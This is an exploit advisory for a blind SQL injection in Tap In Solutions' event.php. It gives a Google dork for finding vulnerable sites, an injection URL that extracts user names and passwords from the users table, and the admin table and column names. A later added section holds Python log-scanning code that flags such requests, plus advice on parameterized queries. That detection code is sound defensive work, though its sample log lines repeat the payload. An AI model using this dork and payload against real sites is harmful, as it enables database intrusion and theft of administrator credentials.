==========================================================================
# Exploit Title: Tap In Solutions Blind SQL Injection Vulnerability
# Date: 17.10.2011
# Author: poach3r
# Software Link: http://www.tapinsolutionsinc.com/
# Tested on: Windows XP SP3
# Google Dork: inurl:event.php?event_id= powered by Tap In Solutions
==========================================================================
# Vulnerable File :
==> event.php <==
# Exploit :
http://127.0.0.1/path/event.php?event_id=[SQL]
# Demo :
http://127.0.0.1/path/event.php?event_id=1/**/and/**/(select/**/substring(concat(1,user_name,password),1,1)/**/from/**/users/**/limit/**/0,1)=1
# Details :
Admin Table : users
Username Column : user_name
Password Column : password
==========================================================================
# GreetZ To : All IRANIAN HackerZ
./End
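
A detection check for the parameter named above, as an added example that is not part of the original advisory: it scans web access-log lines for requests to event.php whose decoded event_id is anything other than a plain integer. The combined-log layout, the sample lines and the integer-only rule for event_id are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate event_id is a short run of digits (the advisory
# only shows numeric ids such as event_id=1).
VALID_ID = re.compile(r"[0-9]{1,10}")
# Request field of a common/combined access-log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample lines (not real traffic). Line 1 reuses the demo URL
# from the advisory; line 2 is a percent-encoded variant of its /**/ padding.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Oct/2011:10:00:01 +0000] '
    '"GET /path/event.php?event_id=1 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [17/Oct/2011:10:00:07 +0000] '
    '"GET /path/event.php?event_id=1/**/and/**/(select/**/substring('
    'concat(1,user_name,password),1,1)/**/from/**/users/**/limit/**/0,1)=1'
    ' HTTP/1.1" 200 5120',
    '192.0.2.66 - - [17/Oct/2011:10:00:09 +0000] '
    '"GET /path/event.php?event_id=1%2F%2A%2A%2Fand%2F%2A%2A%2F1 HTTP/1.1" 200 312',
    '192.0.2.10 - - [17/Oct/2011:10:00:12 +0000] '
    '"GET /path/index.php?page=2 HTTP/1.1" 200 2048',
]

def event_id_values(log_line):
    """Return the URL-decoded event_id values of a request to event.php."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/event.php"):
        return []
    # parse_qs percent-decodes, so encoded payloads are judged after decoding.
    return parse_qs(url.query, keep_blank_values=True).get("event_id", [])

def is_suspicious(log_line):
    """True when any event_id value is not a plain integer."""
    return any(not VALID_ID.fullmatch(v) for v in event_id_values(log_line))

def flag(lines):
    """Return the log lines that deserve review."""
    return [line for line in lines if is_suspicious(line)]

if __name__ == "__main__":
    for hit in flag(SAMPLE_LOG):
        print(hit)
```

Enforcing the same integer-only rule inside event.php before the value reaches the query, together with a parameterized query, removes the injection point rather than only detecting its use.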